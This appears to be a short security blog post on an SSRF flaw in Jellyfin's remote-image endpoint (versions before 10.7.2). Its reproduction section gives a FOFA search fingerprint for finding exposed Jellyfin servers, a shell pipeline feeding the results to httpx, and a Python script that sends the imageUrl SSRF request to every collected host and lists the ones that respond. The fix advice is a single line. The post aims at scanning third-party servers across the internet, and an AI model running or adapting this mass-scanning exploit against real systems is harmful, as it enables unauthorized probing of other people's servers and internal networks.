Vulnerability Introduction#
Jellyfin is a free software media system that allows you to control the management and streaming of media. It is an alternative to proprietary software such as Emby and Plex, and provides media to end-user devices from a dedicated server through multiple applications. Jellyfin is the successor to Emby version 3.5.2, ported to the .NET Core framework to support full cross-platform support. There are no additional conditions, just a team wanting to build something better and working together to make the best media system accessible to all users.
There is an SSRF vulnerability in the Jellyfin RemoteImageController.cs file, which can be exploited to probe internal network information by constructing a special request.
Affected Versions#
Jellyfin < 10.7.2
Vulnerability Reproduction#
The fingerprint of the fofa search engine is: "Jellyfin" && port="8096", use the Fofa 采集工具.exe to collect assets in batches.
The collected asset results will be saved to a result.csv file in the same directory.
Filter the IP or domain name using a shell command.
cat result.csv | awk -F "," '{print $2}' | httpx >> Jellyfin.txt
Then use a Python script to validate in batches.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def Jellyfin():
with open("Jellyfin.txt") as file:
for line in file:
vuln_url = line + "/Images/Remote?imageUrl=http://www.baidu.com"
try:
response = requests.get(url=vuln_url, verify=False, timeout=10)
if response.status_code == 200:
print(vuln_url)
else:
pass
continue
except Exception as e:
pass
#print(e)
continue
def main():
Jellyfin()
if __name__ == '__main__':
main()
Vulnerability Fix#
Update the version.
Reference Links#
For information about SSRF vulnerabilities, you can refer to this article: